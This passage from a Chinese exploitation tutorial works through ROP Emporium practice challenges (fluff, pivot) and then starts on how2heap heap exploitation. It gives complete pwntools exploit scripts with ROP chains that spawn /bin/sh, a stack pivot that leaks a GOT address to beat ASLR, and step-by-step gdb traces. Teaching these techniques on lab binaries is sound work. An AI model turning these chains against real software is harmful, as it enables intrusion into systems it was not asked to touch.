    payload += l32(xor_edx_edx)
    payload += "BBBB"
    payload += l32(pop_ebx)
    payload += data
    payload += l32(xor_edx_ebx)
    payload += "BBBB"

    # edx -> [ecx]
    payload += l32(mov_ecx_edx)
    payload += "BBBB"
    payload += l32(0)

    return payload

payload  = "A"*44

payload += write_data("/bin", data_addr)
payload += write_data("/sh\x00", data_addr + 4)

payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)

io = zio('./fluff32')
io.writeline(payload)
io.interact()

fluff

提示：在使用 ropgadget 搜索时加上参数 --depth 可以得到更大长度的 gadgets。

$ ropgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
...
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
from pwn import *

system_plt = 0x004005e0
data_addr  = 0x0000000000601050

xor_r11_r11 = 0x0000000000400822
xor_r11_r12 = 0x000000000040082f
xchg_r11_r10 = 0x0000000000400840
mov_r10_r11 = 0x000000000040084c
pop_r12 = 0x0000000000400832

def write_data(data, addr):
    # addr -> r10
    payload  = p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += p64(addr)
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"
    payload += p64(xchg_r11_r10)
    payload += "BBBBBBBB"

    # data -> r11
    payload += p64(xor_r11_r11)
    payload += "BBBBBBBB"
    payload += p64(pop_r12)
    payload += data
    payload += p64(xor_r11_r12)
    payload += "BBBBBBBB"

    # r11 -> [r10]
    payload += p64(mov_r10_r11)
    payload += "BBBBBBBB"*2
    payload += p64(0)

    return payload

payload  = "A"*40
payload += write_data("/bin/sh\x00", data_addr)
payload += p64(system_plt)

io = process('./fluff')
io.recvuntil('>')
io.sendline(payload)
io.interactive()

pivot32

这是挑战的最后一题，难度突然增加。首先是动态库，动态库中函数的相对位置是固定的，所以如果我们知道其中一个函数的地址，就可以通过相对位置关系得到其他任意函数的地址。在开启 ASLR 的情况下，动态库加载到内存中的地址是变化的，但并不影响库中函数的相对位置，所以我们要想办法先泄露出某个函数的地址，从而得到目标函数地址。

通过分析我们知道该程序从动态库 libpivot32.so 中导入了函数 foothold_function()，但在程序逻辑中并没有调用，而在 libpivot32.so 中还有我们需要的函数 ret2win()。

现在我们知道了可以泄露的函数 foothold_function()，那么怎么泄露呢。前面我们已经简单介绍了延时绑定技术，当我们在调用如 func@plt() 的时候，系统才会将真正的 func() 函数地址写入到 GOT 表的 func.got.plt 中，然后 func@plt() 根据 func.got.plt 跳转到真正的 func() 函数上去。

最后是该挑战最重要的部分，程序运行我们有两次输入，第一次输入被放在一个由 malloc() 函数分配的堆上，当然为了降低难度，程序特地将该地址打印了出来，第二次的输入则被放在一个大小限制为 13 字节的栈上，这个空间不足以让我们执行很多东西，所以需要运用 stack pivot，即通过覆盖调用者的 ebp，将栈帧转移到另一个地方，同时控制 eip，即可改变程序的执行流，通常的 payload（这里称为副payload）结构如下：

buffer padding | fake ebp | leave;ret addr |

这样函数的返回地址就被覆盖为 leave;ret 指令的地址，这样程序在执行完其原本的 leave;ret 后，又执行了一次 leave;ret。

另外 fake ebp 指向我们另一段 payload（这里称为主payload）的 ebp，即主payload 地址减 4 的地方，当然你也可以在构造主payload 时在前面加 4 个字节的 padding 作为 ebp：

ebp | payload

我们知道一个函数的入口点通常是：

push ebp
mov  ebp,esp

leave 指令相当于：

mov esp,ebp
pop ebp

ret 指令为相当于：

pop eip

如果遇到一种情况，我们可以控制的栈溢出的字节数比较小，不能完成全部的工作，同时程序开启了 PIE 或者系统开启了 ASLR，但同时在程序的另一个地方有足够的空间可以写入 payload，并且可执行，那么我们就将栈转移到那个地方去。

完整的 exp 如下：

from pwn import *

#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot32')
elf = ELF('./pivot32')
libp = ELF('./libpivot32.so')

leave_ret = 0x0804889f

foothold_plt     = elf.plt['foothold_function'] # 0x080485f0
foothold_got_plt = elf.got['foothold_function'] # 0x0804a024

pop_eax      = 0x080488c0
pop_ebx      = 0x08048571
mov_eax_eax  = 0x080488c4
add_eax_ebx  = 0x080488c7
call_eax     = 0x080486a3

foothold_sym = libp.symbols['foothold_function']
ret2win_sym  = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x1f7

leakaddr  = int(io.recv().split()[20], 16)

# calls foothold_function() to populate its GOT entry, then queries that value into EAX
#gdb.attach(io)
payload_1  = p32(foothold_plt)
payload_1 += p32(pop_eax)
payload_1 += p32(foothold_got_plt)
payload_1 += p32(mov_eax_eax)
payload_1 += p32(pop_ebx)
payload_1 += p32(offset)
payload_1 += p32(add_eax_ebx)
payload_1 += p32(call_eax)

io.sendline(payload_1)

# ebp = leakaddr-4, esp = leave_ret
payload_2  = "A"*40
payload_2 += p32(leakaddr-4) + p32(leave_ret)

io.sendline(payload_2)
print io.recvall()

这里我们在 gdb 中验证一下，在 pwnme() 函数的 leave 处下断点：

gdb-peda$ b *0x0804889f
Breakpoint 1 at 0x804889f
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xffe7ec68 --> 0xf755cf0c --> 0x0
ESP: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EIP: 0x804889f (<pwnme+173>:    leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048896 <pwnme+164>:       call   0x80485b0 <fgets@plt>
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
=> 0x804889f <pwnme+173>:       leave  
   0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
0004| 0xffe7ec44 ('A' <repeats 36 times>, "\f\317U\367\237\210\004\b\n")
0008| 0xffe7ec48 ('A' <repeats 32 times>, "\f\317U\367\237\210\004\b\n")
0012| 0xffe7ec4c ('A' <repeats 28 times>, "\f\317U\367\237\210\004\b\n")
0016| 0xffe7ec50 ('A' <repeats 24 times>, "\f\317U\367\237\210\004\b\n")
0020| 0xffe7ec54 ('A' <repeats 20 times>, "\f\317U\367\237\210\004\b\n")
0024| 0xffe7ec58 ('A' <repeats 16 times>, "\f\317U\367\237\210\004\b\n")
0028| 0xffe7ec5c ('A' <repeats 12 times>, "\f\317U\367\237\210\004\b\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804889f in pwnme ()
gdb-peda$ x/10w 0xffe7ec68
0xffe7ec68:     0xf755cf0c      0x0804889f      0xf755000a      0x00000000
0xffe7ec78:     0x00000002      0x00000000      0x00000001      0xffe7ed44
0xffe7ec88:     0xf755cf10      0xf655d010
gdb-peda$ x/10w 0xf755cf0c
0xf755cf0c:     0x00000000      0x080485f0      0x080488c0      0x0804a024
0xf755cf1c:     0x080488c4      0x08048571      0x000001f7      0x080488c7
0xf755cf2c:     0x080486a3      0x0000000a

执行第一次 leave;ret 之前，我们看到 EBP 指向 fake ebp，即 0xf755cf0c，fake ebp 指向主payload 的 ebp，而在 fake ebp 后面是 leave;ret 的地址 0x0804889f，即返回地址。

执行第一次 leave：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec6c --> 0x804889f (<pwnme+173>:     leave)
EIP: 0x80488a0 (<pwnme+174>:    ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
   0x804889f <pwnme+173>:       leave  
=> 0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
   0x80488a7 <uselessFunction+6>:       call   0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec6c --> 0x804889f (<pwnme+173>:    leave)
0004| 0xffe7ec70 --> 0xf755000a --> 0x0
0008| 0xffe7ec74 --> 0x0
0012| 0xffe7ec78 --> 0x2
0016| 0xffe7ec7c --> 0x0
0020| 0xffe7ec80 --> 0x1
0024| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0028| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()

EBP 的值 0xffe7ec68 被赋值给 ESP，然后从栈中弹出 0xf755cf0c，即 fake ebp 并赋值给 EBP，同时 ESP+4=0xffe7ec6c，指向第二次的 leave。

执行第一次 ret：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec70 --> 0xf755000a --> 0x0
EIP: 0x804889f (<pwnme+173>:    leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048896 <pwnme+164>:       call   0x80485b0 <fgets@plt>
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
=> 0x804889f <pwnme+173>:       leave  
   0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec70 --> 0xf755000a --> 0x0
0004| 0xffe7ec74 --> 0x0
0008| 0xffe7ec78 --> 0x2
0012| 0xffe7ec7c --> 0x0
0016| 0xffe7ec80 --> 0x1
0020| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0024| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
0028| 0xffe7ec8c --> 0xf655d010 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804889f in pwnme ()

EIP=0x804889f，同时 ESP+4。

第二次 leave：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
EIP: 0x80488a0 (<pwnme+174>:    ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
   0x804889f <pwnme+173>:       leave  
=> 0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
   0x80488a7 <uselessFunction+6>:       call   0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>:        jmp    DWORD PTR ds:0x804a024)
0004| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>:        pop    eax)
0008| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>:        push   0x30)
0012| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0016| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0020| 0xf755cf24 --> 0x1f7
0024| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0028| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
gdb-peda$ x/10w 0xf755cf10
0xf755cf10:     0x080485f0      0x080488c0      0x0804a024      0x080488c4
0xf755cf20:     0x08048571      0x000001f7      0x080488c7      0x080486a3
0xf755cf30:     0x0000000a      0x00000000

EBP 的值 0xf755cf0c 被赋值给 ESP，并将主payload 的 ebp 赋值给 EBP，同时 ESP+4=0xf755cf10，这个值正是我们主payload 的地址。

第二次 ret：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop    eax)
EIP: 0x80485f0 (<foothold_function@plt>:        jmp    DWORD PTR ds:0x804a024)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80485e0 <exit@plt>:        jmp    DWORD PTR ds:0x804a020
   0x80485e6 <exit@plt+6>:      push   0x28
   0x80485eb <exit@plt+11>:     jmp    0x8048580
=> 0x80485f0 <foothold_function@plt>:   jmp    DWORD PTR ds:0x804a024
 | 0x80485f6 <foothold_function@plt+6>: push   0x30
 | 0x80485fb <foothold_function@plt+11>:        jmp    0x8048580
 | 0x8048600 <__libc_start_main@plt>:   jmp    DWORD PTR ds:0x804a028
 | 0x8048606 <__libc_start_main@plt+6>: push   0x38
 |->   0x80485f6 <foothold_function@plt+6>:     push   0x30
       0x80485fb <foothold_function@plt+11>:    jmp    0x8048580
       0x8048600 <__libc_start_main@plt>:       jmp    DWORD PTR ds:0x804a028
       0x8048606 <__libc_start_main@plt+6>:     push   0x38
                                                                  JUMP is taken
[------------------------------------stack-------------------------------------]
0000| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>:        pop    eax)
0004| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>:        push   0x30)
0008| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0012| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0016| 0xf755cf24 --> 0x1f7
0020| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0024| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0028| 0xf755cf30 --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080485f0 in foothold_function@plt ()

成功跳转到 foothold_function@plt，接下来系统通过 _dl_runtime_resolve 等步骤，将真正的地址写入到 .got.plt 中，我们构造 gadget 泄露出该地址地址，然后计算出 ret2win() 的地址，调用它，就成功了。

地址泄露的过程：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x54 ('T')
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>:      push   ebp)
EIP: 0x80488c0 (<usefulGadgets>:        pop    eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488ba:   xchg   ax,ax
   0x80488bc:   xchg   ax,ax
   0x80488be:   xchg   ax,ax
=> 0x80488c0 <usefulGadgets>:   pop    eax
   0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
0004| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0008| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0012| 0xf755cf24 --> 0x1f7
0016| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0020| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0024| 0xf755cf30 --> 0xa ('\n')
0028| 0xf755cf34 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c0 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:       mov    eax,DWORD PTR [eax])
EIP: 0x80488c1 (<usefulGadgets+1>:      ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488bc:   xchg   ax,ax
   0x80488be:   xchg   ax,ax
   0x80488c0 <usefulGadgets>:   pop    eax
=> 0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
   0x80488c6 <usefulGadgets+6>: ret
[------------------------------------stack-------------------------------------]
0000| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0004| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0008| 0xf755cf24 --> 0x1f7
0012| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0016| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0020| 0xf755cf30 --> 0xa ('\n')
0024| 0xf755cf34 --> 0x0
0028| 0xf755cf38 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c1 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>:      pop    ebx)
EIP: 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
=> 0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
   0x80488c6 <usefulGadgets+6>: ret
   0x80488c7 <usefulGadgets+7>: add    eax,ebx
   0x80488c9 <usefulGadgets+9>: ret
   0x80488ca <usefulGadgets+10>:        xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c4 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xf7772770 (<foothold_function>:   push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>:      pop    ebx)
EIP: 0x80488c6 (<usefulGadgets+6>:      ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
=> 0x80488c6 <usefulGadgets+6>: ret
   0x80488c7 <usefulGadgets+7>: add    eax,ebx
   0x80488c9 <usefulGadgets+9>: ret
   0x80488ca <usefulGadgets+10>:        xchg   ax,ax
   0x80488cc <usefulGadgets+12>:        xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c6 in usefulGadgets ()

pivot

基本同上，但你可以尝试把修改 rsp 的部分也用 gadgets 来实现，这样做的好处是我们不需要伪造一个堆栈，即不用管 ebp 的地址。如：

payload_2  = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)

实际上，我本人正是使用这种方法，因为我在构建 payload 时，0x0000000000400ae0 <+165>: leave，leave;ret 的地址存在截断字符 0a，这样就不能通过正常的方式写入缓冲区，当然这也是可以解决的，比如先将 0a 换成非截断字符，之后再使用寄存器将 0a 写入该地址，这也是通常解决缓冲区中截断字符的方法，但是这样做难度太大，不推荐，感兴趣的读者可以尝试一下。

$ ropgadget --binary pivot --only "mov|pop|call|add|xchg|ret"
0x0000000000400b09 : add rax, rbp ; ret
0x000000000040098e : call rax
0x0000000000400b05 : mov rax, qword ptr [rax] ; ret
0x0000000000400b00 : pop rax ; ret
0x0000000000400900 : pop rbp ; ret
0x0000000000400b02 : xchg rax, rsp ; ret
from pwn import *

#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot')
elf = ELF('./pivot')
libp = ELF('./libpivot.so')

leave_ret = 0x0000000000400adf

foothold_plt     = elf.plt['foothold_function'] # 0x400850
foothold_got_plt = elf.got['foothold_function'] # 0x602048

pop_rax      = 0x0000000000400b00
pop_rbp      = 0x0000000000400900
mov_rax_rax  = 0x0000000000400b05
xchg_rax_rsp = 0x0000000000400b02
add_rax_rbp  = 0x0000000000400b09
call_rax     = 0x000000000040098e

foothold_sym = libp.symbols['foothold_function']
ret2win_sym  = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x14e

leakaddr  = int(io.recv().split()[20], 16)

# calls foothold_function() to populate its GOT entry, then queries that value into EAX
#gdb.attach(io)
payload_1  = p64(foothold_plt)
payload_1 += p64(pop_rax)
payload_1 += p64(foothold_got_plt)
payload_1 += p64(mov_rax_rax)
payload_1 += p64(pop_rbp)
payload_1 += p64(offset)
payload_1 += p64(add_rax_rbp)
payload_1 += p64(call_rax)

io.sendline(payload_1)

# rsp = leakaddr
payload_2  = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)

io.sendline(payload_2)
print io.recvall()

这样基本的 ROP 也就介绍完了，更高级的用法会在后面的章节中再介绍，所谓的高级，也就是 gadgets 构造更加巧妙，运用操作系统的知识更加底层而已。

3.1.6 Linux 堆利用（上）

Linux 堆简介

堆是程序虚拟地址空间中的一块连续的区域，由低地址向高地址增长。当前 Linux 使用的堆分配器被称为 ptmalloc2，在 glibc 中实现。

更详细的我们已经在章节 1.5.8 中介绍了，章节 1.5.7 中也有相关内容，请回顾一下。

对堆利用来说，不用于栈上的溢出能够直接覆盖函数的返回地址从而控制 EIP，只能通过间接手段来劫持程序控制流。

how2heap

how2heap 是由 shellphish 团队制作的堆利用教程，介绍了多种堆利用技术，这篇文章我们就通过这个教程来学习。推荐使用 Ubuntu 16.04 64位系统环境，glibc 版本如下：

$ file /lib/x86_64-linux-gnu/libc-2.23.so
/lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=088a6e00a1814622219f346b41e775b8dd46c518, for GNU/Linux 2.6.32, stripped
$ git clone https://github.com/shellphish/how2heap.git
$ cd how2heap
$ make

请注意，下文中贴出的代码是我简化过的，剔除和修改了一些不必要的注释和代码，以方便学习。另外，正如章节 4.3 中所讲的，添加编译参数 CFLAGS += -fsanitize=address 可以检测内存错误。下载文件

first_fit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char* a = malloc(512);
    char* b = malloc(256);
    char* c;

    fprintf(stderr, "1st malloc(512): %p\n", a);
    fprintf(stderr, "2nd malloc(256): %p\n", b);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    fprintf(stderr, "first allocation %p points to %s\n", a, a);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    c = malloc(500);
    fprintf(stderr, "3rd malloc(500): %p\n", c);
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
    fprintf(stderr, "first allocation %p points to %s\n", a, a);
}
$ gcc -g first_fit.c
$ ./a.out
1st malloc(512): 0x1380010
2nd malloc(256): 0x1380220
first allocation 0x1380010 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x1380010
3rd allocation 0x1380010 points to CCCCCCCC
first allocation 0x1380010 points to CCCCCCCC

这第一个程序展示了 glibc 堆分配的策略，即 first-fit。在分配内存时，malloc 会先到 unsorted bin（或者fastbins）中查找适合的被 free 的 chunk，如果没有，就会把 unsorted bin 中的所有 chunk 分别放入到所属的 bins 中，然后再去这些 bins 里去找合适的 chunk。可以看到第三次 malloc 的地址和第一次相同，即 malloc 找到了第一次 free 掉的 chunk，并把它重新分配。

在 gdb 中调试，两个 malloc 之后（chunk 位于 malloc 返回地址减去 0x10 的位置）：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000000  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

第一个 free 之后，将其加入到 unsorted bin 中：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a [be freed]
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78      <-- fd pointer, bk pointer
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000110 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x210, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.

第三个 malloc 之后：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk c
0x602010:   0x4343434343434343  0x00007ffff7dd1d00
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

所以当释放一块内存后再申请一块大小略小于的空间，那么 glibc 倾向于将先前被释放的空间重新分配。

好了，现在我们加上内存检测参数重新编译：

$ gcc -fsanitize=address -g first_fit.c
$ ./a.out
1st malloc(512): 0x61500000fd00
